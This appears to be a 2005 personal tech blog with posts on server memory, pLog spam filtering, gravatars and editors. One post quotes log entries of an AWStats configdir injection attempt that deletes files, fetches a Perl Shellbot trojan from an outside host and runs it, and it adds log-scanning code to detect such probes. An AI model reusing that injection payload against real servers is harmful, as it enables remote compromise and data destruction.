15 Jul, 2005
Saving memory
Since I have been having problems with what appears to be a memory leak, I have been taking a look at what has been taking all of the memory. I created a cron job that gets the status of the computer every five minutes. It runs the following command.
ps -auxw; cat /proc/meminfo
I don't have a monitor connected to this computer, but I do run a vnc server. This had been configured to start KDE. I changed the window manager for this vnc server to fvwm. This is a window manager that is smaller than KDE.
15 Jul, 2005
Another "productivity" tool
Planarity is a pretty fun puzzle game.
[via I Hate My Cubicle!!!]
13 Jul, 2005
iBoot
Today my server became unresponsive. It looks like apache was eating all of the memory on my computer, as I saw before. Luckily, my wife was home so she was able to reboot the computer.
I wanted to find an easier way to reboot the computer remotely. I found that the Dataprobe iBoot is a device that can cut power to any device that is connected to the electrical outlet. It also looks like you can configure it so that it will cut power and restore it if this device doesn't receive any network pings.
It looks like this will be available at the end of August for around $250.
Technorati Tags: apache, Dataprobe iBoot, Software
13 Jul, 2005
Gravatar
I have just configured this blog to display gravatars next to each comment. A gravatar is a globally recognized avatar. You can sign up for free on gravatar.com, and upload a picture that you want associated with your email.
Then when a web site wants to display an image associated with your email address, it hashes the email address with MD5, and then sends an HTTP request to the gravatar.com web site. Since it is using MD5, it will not be possible to determine the email address from the URL.
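As an added illustration (not code from this blog, pLog or Gravatar): the MD5 value is one-way but unsalted, so the same address yields the same identifier on every site that embeds the avatar. The sketch computes that value and shows a blog-side proxy that publishes a keyed per-site token instead; `AvatarProxy`, `site_key` and the URL form used here are assumptions.

```python
import hashlib
import hmac


def _normalise(email):
    # Gravatar's documented rule: trim whitespace and lowercase before hashing
    return email.strip().lower().encode("utf-8")


def gravatar_hash(email):
    """Unsalted MD5 of the address: identical on every site that embeds it."""
    return hashlib.md5(_normalise(email)).hexdigest()


def gravatar_url(email, size=40):
    return f"https://www.gravatar.com/avatar/{gravatar_hash(email)}?s={size}"


class AvatarProxy:
    """Hypothetical blog-side proxy: pages carry a per-site token, and only the
    server translates it to the upstream URL when it fetches the image."""

    def __init__(self, site_key):
        self._key = site_key
        self._upstream = {}

    def token_for(self, email):
        # Keyed hash: without site_key the token cannot be recomputed, nor
        # matched against the token another site issues for the same address
        mac = hmac.new(self._key, _normalise(email), hashlib.sha256)
        token = mac.hexdigest()[:32]
        self._upstream[token] = gravatar_url(email)
        return token

    def upstream_for(self, token):
        # Unknown tokens resolve to None rather than to a guessable URL
        return self._upstream.get(token)
```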
Technorati Tags: Blogging, gravatar
12 Jul, 2005
Fixed filtering bug in pLog
I had been noticing that spam comment messages had been getting through my spam filter in pLog. When I looked at the bayesian token database, it appeared that the tokens were being considered non-spam tokens. I wasn't able to find the messages that had those tokens in them.
After a little investigation, I found the problem. It appeared that if the message passed through the bayesian filter, and it thought that it wasn't spam, and then if it was blocked by another filter, the message was deleted. This would prevent me from being able to correct the bayesian spam filter.
I made a fix for this and have put it in the bug report. Now when a comment is rejected for any reason, if the bayesian filter thought that it was not spam, it will untrain it and then retrain it as spam. Once it is approved, I will check it in.
With this fix, all spam messages have been blocked. (And the bayesian database is being trained correctly.)
12 Jul, 2005
Fixed php upgrade problems
Since I had the problems upgrading php, I really didn't spend too much more time trying to figure out what the problem was. Just recently, the 4.3.11 version of php was released, so I decided to try the upgrade again.
I hit the same problem again. I did another search and I found the solution to my problem. I disabled the zend optimizer, and everything works correctly.
Technorati Tags: php, security
8 Jul, 2005
potential security hole in awstats [updated]
I noticed the following entries in my log file:
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;↵
rm%20-rf%20a.txt*;echo| HTTP/1.1" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:38 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;↵
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;↵
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;↵
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;↵
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;↵
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;↵
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;↵
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;↵
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
It appears that this person is attempting to have awstats download a perl script and have it executed on the web server. When I looked at the script that it is attempting to download, it attempts to connect to an irc server and sends information there. (ClamAV identifies this script as "Trojan.Perl.Shellbot.C")
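A way to pull these probes out of an access log, as an added example that is not part of the original post: it flags `awstats.pl` requests whose `configdir` value contains shell metacharacters and records the status code, so the one path that answered 200 stands out from the 404 guesses. The sample lines are constructed, with documentation addresses and a shortened payload.

```python
import re
from urllib.parse import unquote

# Apache combined log format: client, ident, user, [time], "request", status, size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d" (?P<status>\d{3}) \S+'
)
# Characters that never belong in a configuration directory path
SHELL_META = re.compile(r"[|;`$&<>]")


def find_configdir_probes(lines):
    """Return one record per awstats.pl request whose configdir has shell syntax."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not path.endswith("/awstats.pl"):
            continue
        # Split on "&" only: the payload itself uses ";" as a command separator
        for pair in query.split("&"):
            key, _, raw = pair.partition("=")
            value = unquote(raw)
            if key == "configdir" and SHELL_META.search(value):
                status = int(m.group("status"))
                hits.append({
                    "client": m.group("client"),
                    "path": path,
                    "status": status,
                    # 200: a script answered at this path (not proof the
                    # command ran); 404: the guessed path does not exist
                    "script_present": status == 200,
                    "configdir": value,
                })
    return hits


# Constructed sample lines modelled on the entries above
SAMPLE = [
    '192.0.2.10 - - [09/Jul/2005:00:01:38 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;echo| HTTP/1.1" 200 749 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [09/Jul/2005:00:05:02 -0700] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [09/Jul/2005:00:05:09 -0700] "GET /cgi-bin/awstats.pl?configdir=/etc/awstats HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_configdir_probes(SAMPLE):
        print(hit["client"], hit["status"], hit["path"], repr(hit["configdir"]))
```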
8 Jul, 2005
DNS Anti Spam plugin
I have just enabled the DNS Anti Spam plugin to catch comment spam that isn't stopped with the bayesian filter. This plugin does some dns checks to determine if:
- The ip address is from a known spammer on sorbs.net, spamhaus.org, or dsbl.org.
- The title, body text, or the username has a url that is known to be sent out as spam at surbl.org
- The url is known to be sent out as spam at surbl.org
Technorati Tags: pLog, spam, Software
8 Jul, 2005
blog comment spam schedule?
I was curious about what type of comments were being caught in the bayesian spam filter that pLog has, so I changed my setting to keep the spam messages (still marked as spam) instead of deleting them. One thing that I noticed is that it appears that on the 27th minute after the hour, a batch of spam comments gets posted. (All of them are caught by the filter.)
If I have the 27th minute, I wonder who has the top of the hour.
Technorati Tags: Blogging, pLog, spam
8 Jul, 2005
Google as a referrer?
I have noticed someone doing something strange. They have configured their browser to report the referrer as Google.
XXX.XX.XX.XX - - [08/Jul/2005:16:26:28 -0700] "GET /index.php?op=ViewArticle&articleId=492&blogId=2 HTTP/1.0" 200 28062 "http://www.google.com/" "Mozilla (X11; I; Linux 2.0.32 i586)"
I can't imagine that there are web servers that allow different content when the referrer is the home page of Google. Especially since most valid referrers from Google will contain the search query. (I really doubt that I am listed on Google's main page.)
7 Jul, 2005
pLog and xml vulnerability
A vulnerability has been found in several implementations of xmlrpc libraries for php. pLog is not affected by this problem as it uses the Incutio XMLRPC library.
It looks like WordPress is affected by this problem. The 1.5.1.3 version of WordPress has fixed this problem.
Technorati Tags: Blogging, pLog, security
7 Jul, 2005
Creating XHTML in SubEthaEdit
I had just started playing with TextWrangler, and then I saw this post that describes a very cool feature of SubEthaEdit. Since SubEthaEdit will colorize text, now you can make this available in xhtml.
In the Edit menu, there is a menu item named "Copy As XHTML". This will put the XHTML in your clipboard. The result will look something like:
include_once( PLOG_CLASS_PATH."class/plugin/pluginbase.class.php" );
include_once( PLOG_CLASS_PATH."class/net/http/httpclient.class.php" );
include_once( PLOG_CLASS_PATH."class/net/requestgenerator.class.php" );

/**
 * implements notification of
 */
class PluginSiteMap extends PluginBase
{
    var $pluginEnabled;
    var $cacheFolder;
}
[via Paint The Tiger]
Technorati Tags: Mac OS X, Software, SubEthaEdit, TextWrangler
6 Jul, 2005
Slingbox questions
It looks like Sling Media is shipping their Slingbox device. This looks like a very cool way to be able to watch all of your video content outside of your house. In fact, I think that this could replace some of the uses of BitTorrent for video content. (I think that BitTorrent is used when people already have access to the content at home, but they want to watch it somewhere else.)
I wonder a couple of things about the Slingbox:
- How does the setup software get the list of possible remote codes? It doesn't look like there is a way to learn remote codes from the Slingbox itself. Maybe they have a database that is similar to the one used by Harmony Remotes.
- Would it be possible to learn IR codes from multiple devices? For example, plug an AV switcher into the Slingbox, and use remote codes for the AV switcher to change video source, and then send commands for that device.
Technorati Tags: Electronics, gadgets, Slingbox
6 Jul, 2005
Technorati Tags
I have just started playing with Technorati Tags, since ecto has built in support for them. I can see two uses for tags that are not currently handled by the categories:
- Allow you to categorize your posts more specifically
- Creates a link to other posts on the same topic
Ecto's implementation adds a link to the bottom of the post with links to the Technorati Tags page.
6 Jul, 2005
TextWrangler
I saw this post on TUAW about TextWrangler. It is a free text editor from Bare Bones Software that has some very cool features.
- grep search and replace
- syntax coloring
- integration with native perl
- built-in ftp/sftp client
- AppleScript support
- command line tools
Technorati Tags: Mac OS X, TextWrangler, Software